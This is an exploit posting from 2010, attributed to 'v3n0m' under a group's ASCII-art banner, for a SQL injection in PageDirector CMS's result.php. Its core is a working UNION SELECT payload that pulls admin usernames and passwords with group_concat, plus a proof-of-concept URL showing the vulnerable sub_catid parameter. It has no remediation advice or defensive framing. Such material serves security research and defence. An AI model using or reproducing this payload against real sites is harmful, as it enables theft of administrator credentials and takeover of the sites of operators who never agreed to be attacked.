) )) ( ( ( (( ) )
( /(( /( ( ( /(( (( )\ ))\ ))\ ))\ ) )\ ) ( /(( /(
)\())\()))\ ))\()) )\)\ )\ (()/(()/(((()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)((((_)(((_)(/(_))(_)) )\/(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))_((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ ||_ _|| \| | |/ /
\ V / (_) || (_ |\ V / / _ \| (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
|_| \___/\___| |_| /_/ \_\\___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
.WEB.ID
-----------------------------------------------------------------------
PageDirector CMS (result.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : June, 29-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : PageDirector CMS
Vendor : http://www.customerparadigm.com/
Price : $675.00
----------------------------------------------------------------
Exploit:
~~~~~~~
+and+1=2+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8,9,10,11,12+from+admin--
Poc:
~~~~~~~
http://127.0.0.1/[path]/result.php?catid=[xxx]&sub_catid=[SQLi]
**[xxx] = valid catid
----------------------------------------------------------------
WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com
---------------------------[EOF]--------------------------------